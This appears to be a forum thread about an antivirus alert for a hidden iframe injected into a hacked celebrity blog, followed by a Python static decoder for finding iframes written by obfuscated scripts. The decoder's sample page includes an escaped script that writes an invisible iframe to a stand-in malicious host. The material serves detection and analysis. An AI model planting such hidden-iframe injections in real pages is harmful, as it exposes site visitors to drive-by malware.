IFrame-EB on stephenfry.com - is this a false positive?

Avast has detected “HTML:IFrame-EB [trj]” on hxxp://www.stephenfry.com/blog (I’ve substituted x for t in the URL).

My browser is Opera 9.64 on XP SP3 with JavaScript turned off. I’ve used curl to fetch the contents to look at in a text editor.

It looks to me as if the suspect content is merely a web bug (1x1 GIF) served up by hxxp://ad.uk.doubleclick.net

The script content has some randomization so I can’t be sure where I’d be taken if I turned JavaScript back on.

Should I report this as a false positive?

Hello,

It looks like they are fixing the problem right now - probably not a false positive.

Regards

The web site is still displaying a holding message. I’ve kept copies of the old content and will compare when the site returns.

The URLs in the iframe all belong to DoubleClick. Is it just having a web bug in an iframe that is giving the IFrame-EB?

Look out for script tags that might be obfuscated, as they are frequently what generate the iframe rather than visible iframe tags in the page source.

The web shield has been very hot on these alerts (hacked sites) and of all those that I have checked out in the forums, all have to date proved to have been good detections.

Okay, I’ve found it. The obfuscated script resolves to an invisible iframe containing seo**use.*n where the asterisks stand for abc in this post.

Thanks for the explanation.

So the warning from Avast was a genuine positive.

You’re welcome, the detection is most certainly good.
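
The check discussed in this thread (looking inside obfuscated script tags rather than only at visible iframe tags), as an added example that is not part of the original posts: a Python check for a page saved with curl that statically decodes %-escaped, \x-escaped and fromCharCode strings without running any script, then lists iframe sources found in the markup versus those only a script would write. The sample page and the ads.example / bad.example hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample (not the real site's content): a visible 1x1 ad iframe,
# a script that writes a hidden iframe from a %-escaped string, and a benign script.
SAMPLE_HTML = """<html><body>
<iframe src="http://ads.example/pixel" width="1" height="1"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//bad.example/in.php%22%20width%3D0%20height%3D0%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));</script>
<script>var n = String.fromCharCode(72, 105);</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
CHARCODE_RE = re.compile(r"fromCharCode\(([\d\s,]+)\)", re.I)
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""", re.S)
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

def decode_layers(script):
    """Statically decode common string encodings; the script is never executed."""
    out = []
    for m in CHARCODE_RE.finditer(script):
        out.append("".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()))
    for m in STRING_RE.finditer(script):
        lit = m.group(2)
        if "%" in lit or "\\x" in lit:
            lit = HEX_RE.sub(lambda h: chr(int(h.group(1), 16)), lit)
            out.append(unquote(lit))
    return out

def find_iframes(html):
    """Return (origin, src) pairs: 'markup' for visible tags, 'script' for decoded ones."""
    hits = []
    for tag in IFRAME_RE.findall(SCRIPT_RE.sub("", html)):
        hits += [("markup", src) for src in SRC_RE.findall(tag)]
    for body in SCRIPT_RE.findall(html):
        for decoded in decode_layers(body):
            for tag in IFRAME_RE.findall(decoded):
                hits += [("script", src) for src in SRC_RE.findall(tag)]
    return hits

if __name__ == "__main__":
    for origin, src in find_iframes(SAMPLE_HTML):
        print(f"{origin:6}  {src}")
```

Scripts that build the string at run time with randomization or custom decoders will not be resolved by static decoding like this and need analysis in an isolated JavaScript sandbox.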